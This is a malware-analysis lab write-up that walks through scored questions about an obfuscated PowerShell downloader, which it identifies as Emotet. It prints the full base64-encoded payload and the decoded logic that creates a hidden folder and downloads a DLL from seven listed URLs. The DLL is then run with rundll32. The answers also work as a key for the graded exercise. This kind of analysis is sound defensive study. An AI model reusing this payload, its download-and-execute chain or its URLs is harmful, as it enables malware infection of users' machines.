Malicious PowerShell Analysis

What security protocol is being used for the communication with a malicious domain? (3 points)

$ echo 'IABzAEUAdAAgAE0ASwB1ACAAKAAgAFsAVABZAFAAZQBdACgAIgB7ADAAfQB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQAiACAALQBGACAAJwBTAFkAcwBUACcALAAnAGUATQAuACcALAAnAGkAbwAuAEQASQAnACwAJwBPAFIAWQAnACwAJwByAEUAQwB0ACcAKQAgACkAOwAgACAAIAAgAFMAZQBUAC0AaQBUAEUATQAgACAAKAAnAHYAYQBSACcAKwAnAEkAYQBiAEwARQAnACsAJwA6AG0AQgB1ACcAKQAgACgAIAAgAFsAVABZAFAAZQBdACgAIgB7ADYAfQB7ADgAfQB7ADAAfQB7ADMAfQB7ADQAfQB7ADUAfQB7ADIAfQB7ADcAfQB7ADEAfQAiACAALQBmACcAUwB0AGUATQAnACwAJwBHAGUAcgAnACwAJwBNAGEAJwAsACcALgBuACcALAAnAGUAdAAuAHMAZQBSAFYASQBjAGUAcABPAGkAJwAsACcAbgB0ACcALAAnAHMAJwAsACcATgBBACcALAAnAFkAJwApACkAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwAnACsAJwBpAGwAJwApACsAKAAnAGUAbgAnACsAJwB0ACcAKQArACcAbAB5ACcAKwAoACcAQwBvAG4AdAAnACsAJwBpACcAKwAnAG4AdQBlACcAKQApADsAJABDAHYAbQBtAHEANABvAD0AJABRADIANgBMACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABFADEANgBIADsAJABKADEANgBKAD0AKAAnAE4AJwArACgAJwBfADAAJwArACcAUAAnACkAKQA7ACAAKABEAEkAcgAgAFYAYQByAGkAYQBiAEwARQA6AE0AawB1ACAAIAApAC4AVgBhAEwAVQBlADoAOgAiAGMAYABSAEUAQQB0AGAAZQBkAEkAYABSAEUAQwBgAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ACcAKwAnADAAfQBEAGIAXwBiAGgAJwArACcAMwAwACcAKwAnAHsAMAB9ACcAKwAnAFkAZgAnACsAJwA1AGIAZQA1AGcAewAwAH0AJwApACAALQBGACAAWwBjAGgAQQBSAF0AOQAyACkAKQA7ACQAQwAzADkAWQA9ACgAKAAnAFUANgAnACsAJwA4ACcAKQArACcAUwAnACkAOwAgACAAKAAgAHYAQQBSAGkAYQBCAEwAZQAgACAAKAAiAG0AIgArACIAYgB1ACIAKQAgACAALQBWAEEAbAB1AGUAbwBOACAAIAApADoAOgAiAHMARQBjAHUAUgBJAFQAWQBwAHIAbwBUAGAAbwBgAGMAYABvAGwAIgAgAD0AIAAoACcAVAAnACsAKAAnAGwAcwAnACsAJwAxADIAJwApACkAOwAkAEYAMwA1AEkAPQAoACcASQAnACsAKAAnADQAJwArACcAXwBCACcAKQApADsAJABTAHcAcgBwADYAdABjACAAPQAgACgAKAAnAEEANgAnACsAJwA5ACcAKQArACcAUwAnACkAOwAkAFgAMgA3AEgAPQAoACcAQwAzACcAKwAnADMATwAnACkAOwAkAEkAbQBkADEAeQBjAGsAPQAkAEgATwBNAEUAKwAoACgAKAAnAFUATwAnACsAJwBIACcAKwAnAEQAYgBfACcAKQArACcAYgAnACsAKAAnAGgAMwAnACsAJwAwAFUATwAnACkAKwAoACcASABZACcAKwAnAGYAJwApACsAKAAnADUAYgBlADUAJwArACcAZwAnACsAJwBVAE8ASAAnACkAKQAuACIAUgBlAFAAYABsAEEAQwBlACIAKAAoACcAVQAnACsAJwBPAEgAJwApACwAWwBTAHQAcgBJAG4ARwBdAFsAYwBoAEEAcgBdADkAMgApACkAKwAkAFMAdwByAHAANgB0AGMAKwAoACgAJwAuACcAKwAnAGQAbAAnACkAKwAnAGwAJwApADsAJABLADQANwBWAD0AKAAnAFIAJwArACgAJwA0ACcAKwAnADkARwAnACkAKQA7ACQAQgA5AGYAaABiAHkAdgA9ACgAJwBdACcAKwAoACcAYQAnACsAJwBuAHcAWwAzAHMAOgAvAC8AYQBkAG0AJwArACcAaQBuAHQAJwArACcAawAuAGMAJwArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACkAKwAoACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKwAnAEwALwAnACkAKwAnAEAAJwArACgAJwBdAGEAJwArACcAbgAnACsAJwB3AFsAMwBzACcAKQArACcAOgAnACsAJwAvACcAKwAnAC8AbQAnACsAKAAnAGkAawBlACcAKwAnAGcAZQAnACkAKwAoACcAZQAnACsAJwByACcAKwAnAGkAbgBjAGsALgAnACkAKwAoACcAYwAnACsAJwBvAG0AJwApACsAKAAnAC8AYwAvACcAKwAnAFkAJwArACcAWQBzACcAKQArACcAYQAnACsAKAAnAC8AQABdACcAKwAnAGEAbgB3ACcAKwAnAFsAJwArACcAMwA6AC8ALwBmAHIAZQBlACcAKwAnAGwAYQBuAGMAJwArACcAZQAnACsAJwByAHcAJwApACsAKAAnAGUAYgBkAGUAcwBpACcAKwAnAGcAbgBlAHIAaAAnACsAJwB5AGQAJwApACsAKAAnAGUAcgAnACsAJwBhAGIAYQAnACkAKwAoACcAZAAuACcAKwAnAGMAbwBtAC8AJwApACsAKAAnAGMAZwBpACcAKwAnAC0AYgBpAG4AJwArACcALwBTACcAKQArACgAJwAvACcAKwAnAEAAJwArACcAXQBhAG4AdwAnACkAKwAoACcAWwAzACcAKwAnADoALwAvACcAKwAnAGUAdABkAG8AZwAuAGMAbwAnACsAJwBtACcAKwAnAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGMAbwAnACkAKwAnAG4AdAAnACsAKAAnAGUAJwArACcAbgB0ACcAKQArACgAJwAvAG4AJwArACcAdQAvAEAAJwApACsAKAAnAF0AYQAnACsAJwBuAHcAWwAzACcAKQArACcAcwAnACsAKAAnADoALwAvACcAKwAnAHcAdwB3ACcAKwAnAC4AaABpAG4AdAB1ACcAKwAnAHAALgBjACcAKQArACgAJwBvACcAKwAnAG0ALgAnACkAKwAoACcAYgAnACsAJwByAC8AJwApACsAJwB3ACcAKwAoACcAcAAnACsAJwAtAGMAbwAnACkAKwAoACcAbgAnACsAJwB0AGUAbgAnACkAKwAoACcAdAAnACsAJwAvAGQARQAvACcAKwAnAEAAXQBhACcAKwAnAG4AdwBbADMAOgAvAC8AJwArACcAdwB3AHcALgAnACkAKwAnAHMAJwArACgAJwB0AG0AJwArACcAYQByAG8AdQBuAHMAJwArACcALgAnACkAKwAoACcAbgBzACcAKwAnAHcAJwApACsAKAAnAC4AJwArACcAZQBkAHUALgBhAHUALwBwACcAKwAnAGEAJwArACcAeQAnACsAJwBwAGEAbAAvAGIAOAAnACkAKwAoACcARwAnACsAJwAvAEAAXQAnACkAKwAoACcAYQAnACsAJwBuAHcAWwAnACkAKwAoACcAMwA6ACcAKwAnAC8AJwApACsAKAAnAC8AJwArACcAdwBtAC4AbQBjAGQAZQB2AGUAJwArACcAbABvAHAALgBuAGUAdAAnACsAJwAvACcAKwAnAGMAJwArACcAbwBuACcAKwAnAHQAJwArACcAZQAnACkAKwAoACcAbgB0ACcAKwAnAC8AJwApACsAJwA2ACcAKwAoACcARgAyACcAKwAnAGcAZAAvACcAKQApAC4AIgBSAEUAYABwAGAAbABBAEMAZQAiACgAKAAoACcAXQBhACcAKwAnAG4AJwApACsAKAAnAHcAJwArACcAWwAzACcAKQApACwAKABbAGEAcgByAGEAeQBdACgAJwBzAGQAJwAsACcAcwB3ACcAKQAsACgAKAAnAGgAJwArACcAdAB0ACcAKQArACcAcAAnACkALAAnADMAZAAnACkAWwAxAF0AKQAuACIAcwBgAFAATABJAFQAIgAoACQAQwA4ADMAUgAgACsAIAAkAEMAdgBtAG0AcQA0AG8AIAArACAAJABGADEAMABRACkAOwAkAFEANQAyAE0APQAoACcAUAAnACsAKAAnADAAJwArACcANQBLACcAKQApADsAZgBvAHIAZQBhAGMAaAAgACgAJABCAG0ANQBwAHcANgB6ACAAaQBuACAAJABCADkAZgBoAGIAeQB2ACkAewB0AHIAeQB7ACgAJgAoACcATgBlAHcAJwArACcALQBPAGIAagBlAGMAJwArACcAdAAnACkAIABTAHkAcwBUAGUAbQAuAG4ARQB0AC4AVwBFAEIAYwBMAEkAZQBOAFQAKQAuACIAZABvAGAAVwBOAGwAYABPAGEARABgAEYASQBsAEUAIgAoACQAQgBtADUAcAB3ADYAegAsACAAJABJAG0AZAAxAHkAYwBrACkAOwAkAFoAMQAwAEwAPQAoACcAQQA5ACcAKwAnADIAUQAnACkAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQASQBtAGQAMQB5AGMAawApAC4AIgBsAGUAbgBgAEcAYABUAEgAIgAgAC0AZwBlACAAMwA1ADYAOQA4ACkAIAB7ACYAKAAnAHIAJwArACcAdQBuAGQAbAAnACsAJwBsADMAMgAnACkAIAAkAEkAbQBkADEAeQBjAGsALAAoACgAJwBDAG8AJwArACcAbgB0ACcAKQArACcAcgAnACsAKAAnAG8AbAAnACsAJwBfAFIAdQBuAEQAJwArACcATAAnACkAKwAnAEwAJwApAC4AIgBUAGAATwBTAHQAYABSAGkATgBHACIAKAApADsAJABSADYANQBJAD0AKAAnAFoAJwArACgAJwAwADkAJwArACcAQgAnACkAKQA7AGIAcgBlAGEAawA7ACQASwA3AF8ASAA9ACgAJwBGADEAJwArACcAMgBVACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAVwA1ADQASQA9AC' | base64 -d > decoded.txt

$ sed -i 's/;/\n/g' decoded.txt | sed -i "s/'/ /g" | sed -i 's/"/ /g

TLS 1.2

What directory does the obfuscated PowerShell create? (Starting from \HOME) (4 points)

PS C:\Users\Administrator> echo $(('{'+'0}Db_bh'+'30'+'{0}'+'Yf'+'5be5g{0}') -F [chAR]92)
\Db_bh30\Yf5be5g\

HOME\Db_bh30\Yf5be5g\

What file is being downloaded (full name)? (4 points)

# Tell us '$Swrp6tc' variable + .dll
$Imd1yck=$HOME+((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l')))

# $Swrp6tc variable
$Swrp6tc = (('A6'+'9')+'S')

# PowerShell
PS C:\Users\Administrator> $Swrp6tc = (('A6'+'9')+'S')
PS C:\Users\Administrator> echo $((('UO'+'H'+'Db_')+'b'+('h3'+'0UO')+('HY'+'f')+('5be5'+'g'+'UOH'))."ReP`lACe"(('U'+'OH'
),[StrInG][chAr]92))+$Swrp6tc+(('.'+'dl')+'l')
\Db_bh30\Yf5be5g\
+A69S+
.dll

# Final Result
\Db_bh30\Yf5be5g\A69S.dll

What is used to execute the downloaded file? (3 points)

# ('r'+'undl'+'l32')
rundll32

What is the domain name of the URI ending in ‘/6F2gd/’ (3 points)

PS C:\Users\Administrator> echo $(']'+('a'+'nw[3s://adm'+'int'+'k.c'+'o'+'m/'+'w')+('p-adm'+'in/'+'L/')+'@'+(']a'+'n'+'w
[3s')+':'+'/'+'/m'+('ike'+'ge')+('e'+'r'+'inck.')+('c'+'om')+('/c/'+'Y'+'Ys')+'a'+('/@]'+'anw'+'['+'3://free'+'lanc'+'e'
+'rw')+('ebdesi'+'gnerh'+'yd')+('er'+'aba')+('d.'+'com/')+('cgi'+'-bin'+'/S')+('/'+'@'+']anw')+('[3'+'://'+'etdog.co'+'m
'+'/w')+('p-'+'co')+'nt'+('e'+'nt')+('/n'+'u/@')+(']a'+'nw[3')+'s'+('://'+'www'+'.hintu'+'p.c')+('o'+'m.')+('b'+'r/')+'w
'+('p'+'-co')+('n'+'ten')+('t'+'/dE/'+'@]a'+'nw[3://'+'www.')+'s'+('tm'+'arouns'+'.')+('ns'+'w')+('.'+'edu.au/p'+'a'+'y'
+'pal/b8')+('G'+'/@]')+('a'+'nw[')+('3:'+'/')+('/'+'wm.mcdeve'+'lop.net'+'/'+'c'+'on'+'t'+'e')+('nt'+'/')+'6'+('F2'+'gd/
'))."RE`p`lACe"(((']a'+'n')+('w'+'[3')),([array]('sd','sw'),(('h'+'tt')+'p'),'3d')[1])."s`PLIT"($C83R + $Cvmmq4o + $F10Q
)
https://admintk.com/wp-admin/L/
@https://mikegeerinck.com/c/YYsa/
@http://freelancerwebdesignerhyderabad.com/cgi-bin/S/
@http://etdog.com/wp-content/nu/
@https://www.hintup.com.br/wp-content/dE/
@http://www.stmarouns.nsw.edu.au/paypal/b8G/
@http://wm.mcdevelop.net/content/6F2gd/

wm.mcdevelop.net

Based on the analysis of the obfuscated code, what is the name of the malware? (3 points)

# google \Db_bh30\Yf5be5g\
# https://tria.ge/210104-y5zen4hzds/behavioral1
emotet

PreviousATT&CK NextPowerShell Analysis - Keylogger

Last updated 4 years ago